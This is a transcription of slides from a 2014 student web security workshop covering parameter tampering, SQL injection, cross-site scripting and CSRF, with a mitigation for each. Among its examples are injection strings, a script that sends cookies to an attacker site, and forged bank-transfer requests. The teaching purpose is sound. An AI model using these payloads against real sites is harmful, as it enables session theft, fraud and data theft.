WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Similar documents
WEB SECURITY: XSS & CSRF

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Security. CSC309 TA: Sukwon Oh

P2_L12 Web Security Page 1

CIS 4360 Secure Computer Systems XSS

Web Application Security. Philippe Bogaerts

Application vulnerabilities and defences

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

WebGoat Lab session overview

last time: command injection

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

NET 311 INFORMATION SECURITY

Introduction to Ethical Hacking

Advanced Web Technology 10) XSS, CSRF and SQL Injection

CS 161 Computer Security

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Web basics: HTTP cookies

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

More attacks on clients: Click-jacking/UI redressing, CSRF

Information Security CS 526 Topic 11

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

CS 161 Computer Security

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

CSC 482/582: Computer Security. Cross-Site Security

Security Course. WebGoat Lab sessions

CSCD 303 Essential Computer Security Fall 2018

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

I n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures:

Web Security. Thierry Sans

Reflected XSS Cross-Site Request Forgery Other Attacks

Common Websites Security Issues. Ziv Perry

OWASP TOP 10. By: Ilia

Robust Defenses for Cross-Site Request Forgery

Robust Defenses for Cross-Site Request Forgery Review

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Web Security IV: Cross-Site Attacks

Web Attacks CMSC 414. September 25 & 27, 2017

A D V I S O R Y S E R V I C E S. Web Application Assessment

RKN 2015 Application Layer Short Summary

CSCD 303 Essential Computer Security Fall 2017

Title: Multiple Remote Command Execution vulnerabilities on Avaya Intuity Audix LX (plus some client-side bugs)

Web Vulnerabilities. And The People Who Love Them

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web


Information Security CS 526 Topic 8

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Unusual Web Bugs. A Web App Hacker s Bag O Tricks. Alex kuza55 K.

Web Security. Course: EPL 682 Name: Savvas Savva

SECURE CODING ESSENTIALS

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

CSCE 813 Internet Security Case Study II: XSS

CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS

The OWASP Foundation

Web Security II. Slides from M. Hicks, University of Maryland

Penetration Test Report

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

CS 155 Project 2. Overview & Part A

Your Turn to Hack the OWASP Top 10!

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)

Cross-Site Request Forgery: The Sleeping Giant. Jeremiah Grossman Founder and CTO, WhiteHat Security

IERG 4210 Tutorial 07. Securing web page (I): login page and admin user authentication Shizhan Zhu

IS 2150 / TEL 2810 Introduction to Security

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

Lecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing

Automatically Checking for Session Management Vulnerabilities in Web Applications

An analysis of security in a web application development process

Client Side Injection on Web Applications

CS 161 Computer Security

Web Security: Vulnerabilities & Attacks

The security of Mozilla Firefox s Extensions. Kristjan Krips

CSCE 548 Building Secure Software SQL Injection Attack

CS 142 Winter Session Management. Dan Boneh

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013

C1: Define Security Requirements

EasyCrypt passes an independent security audit

Web Penetration Testing

The PKI Lie. The OWASP Foundation Attacking Certificate Based Authentication. OWASP & WASC AppSec 2007 Conference

Security: Threats and Countermeasures. Stanley Tan Academic Program Manager Microsoft Singapore

Copyright

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

Chat with a hacker. Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev

CSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis

WHY CSRF WORKS. Implicit authentication by Web browsers

CNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies

HTTP Security Headers Explained

TSIT02 Computer Security

Transcription:

WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang

Introduction and Background

Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication barriers

Web Servers Web applications are Internet interfaces to web servers Example web servers: Apache IIS Nginx Self contained servers (often called web services)

Introduction to Languages

Languages PHP Javascript SQL HTML

PHP Interpreted Server Side Dynamic Handles GET/POST Manages Sessions Has Own Set of Vulnerabilities Not Covered Here

PHP

PHP Session Demo 10.176.169.7/web_demo/week1/sample.php Try refreshing the page a few times What do you see? Which part of the page changed?

PHP Line by Line Why did they change? Here is the code:

Javascript Dynamic Embedded in HTML Interpreted Client Side!!!

SQL Query Databases Most Common for CTFs Used to Access Data Usernames Passwords Credit Card #s Fun Stuff

SQL To select a user: SELECT * from users WHERE name = 'Bob'; The username is determined at runtime, so let s make it: SELECT * from users WHERE name = '$name'; For example, if $name is Joe : SELECT * from users WHERE name = 'Joe';

HTML Describes Layout of Webpage Sometimes Contains Debug Info Usually not very interesting...

HTTP Protocol that provides the way to communicate over the web It is stateless and asynchronous Simulate state with sessions Your browser keeps session information The server uses this to keep track of your state Example: Shopping Cart Session has an ID tied to a cart in database Every page you visit has to establish your identity

HTTP Requests Methods GET asks server for information POST gives server data PUT tells server to modify or create data DELETE tells server to delete data Examples GET shows your profile on a webpage POST is used to upload your picture PUT changes your bio DELETE gets rid of the embarrassing picture

HTTP Request Parameters Along with URL and method, requests carry data in the form of parameters GET Visible from URL: http://www.facespace.com/profile.php?id=13 Can be used easily in hyperlinks POST Not visible in URL or link, embedded in request We can still alter these

Parameter Tampering

Overview Very basic attack on HTTP protocol Exploits server s misguided trust in data from user

Example Game High Scores Give me a game Here s one Web Server

Example Game High Scores Web Server Score Game (Local)

Example Game High Scores Here s how I did Nice! Web Server Score Game (Local)

Attack Game High Scores Here s how I SAY I did Nice! Web Server Score Game (Local)

Example PayPal I want to buy this Pay for it with PayPal Merchant

Example PayPal Merchant Here s how much I owe you. Sounds good. PayPal

Example PayPal I paid Thanks! Merchant Tell them you paid PayPal

Attack PayPal Merchant Here s how much I say I owe you. Sounds good. PayPal

Attack PayPal I paid what you said Thanks! Merchant Tell them you paid PayPal

Mitigation Never trust the integrity of data that a user can edit Web services can allow servers to talk and bypass the user

SQL Injection

Overview Injection attacks user takes advantage of poor input sanitization to insert data into the client application that is passed (and trusted) to a server application SQL injection users exploits the trust that the database engine has in the web server by giving the web server data that alters a query Another injection is command injection targets system process execution

Example To select a user: SELECT * from users WHERE name = 'Bob'; The username is determined at runtime, so let s make it: SELECT * from users WHERE name = '$name'; For example, if $name is Joe : SELECT * from users WHERE name = 'Joe';

Attack Let s give it a string that will change the query once substituted into it. Attack string is: ' or '1'='1 When plugged into the query, the following is produced: SELECT * from users where NAME = '' or '1'='1'; This always returns a row

Another injection SELECT money from users where id = $id; We control the $id variable Utilize UNION to forge our own data: 0 UNION SELECT 1000000 Resulting query: SELECT money from users where id = 0 UNION SELECT 1000000;

Blind Injection Only returns True or False. Used to discover information about entries. Can make use of the LIKE operator. The LIKE operator uses pattern matching. For example the command below finds all employee names that start with s. SELECT * FROM employees WHERE employee_name LIKE 's%';

UNION SELECT SELECT money from users where id = $id; We control the $id variable Utilize UNION to forge our own data: 0 UNION SELECT 1000000 Resulting query: SELECT money from users where id = 0 UNION SELECT 1000000;

Table Modification Previously we exploited SELECT this exploits INSERT. INSERT INTO users VALUES ( string1, string2 )

Table Traversal In MYSQL there is a static table called INFORMATION_SCHEMA This reveals information about other tables. Combine with UNION SELECT to get other tables.

Mitigation Parameterized queries. In PHP: Stupid way: $db->query( select user where id = $id ); Smart way: $db->prepare( select user where id = :id ); $db->execute(array( :id => $id)); This is better because the DB doesn t need to trust the web server since the actual query doesn t change DON T FILTER, USE PREPARED STATEMENTS / PARAMETERIZED QUERIES

Cross Site Scripting

Overview Exploits the trust a browser places in a site by running code (usually JS) in browser Reflected: user is tricked into running some code In URL: site.com/?msg=<script> </script> Pasted into address bar Stored: the malicious code is stored persistently on the compromised website Unfiltered comments SQL injections allowing user control where not intended

Payloads and Goals Steal cookies Open a hidden IFRAME Spam advertisements Redirect to another page Click jacking Many more

Example Attack Uses jquery <script>$.get( www.mysite.com/grabber.php?c= + document.cookie);</script> A get request is made to our site, which stores the parameter c in a log file, or autopwns them. Whatever.

Mitigation Developers Don t allow users to post HTML Keep an eye out for places where attackers could modify what other peoples browsers render Users Use NoScript or similar whitelisting plugin Don t click or paste a link with JavaScript in it

Cross Server Request Forgery

Overview Similar to XSS Exploits trust that servers place in browsers It s very difficult for a web server to know whether a request your computer sent it was sent with your knowledge or approval Different than XSS, but XSS is often an attack vector for CSRF

Example Attack Images <img src= bank.com/transfer.php?to=me&amount=1000000 /> XSS $.post( bank.com/transfer.php, {to: me, amount: 1000000});

Mitigation Only trust requests from your domain Use CSRF protection tokens included in many web frameworks Use the appropriate HTTP request, don t use GET for something that modifies data Not much to do as a user

General Tips

Look at Requests! Use TamperData, Firebug, Chrome Developer Tools, Live HTTP Headers, BurpSuite, etc. The idea is to find things we can alter The goal is to invalidate trust that the developer put in us

Inject Everything If your data goes into a database query, try SQL injection If you think it s piping your input into a program, try command injection via && and the like If it looks like it s rendering HTML, try some JavaScript

Questions?

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback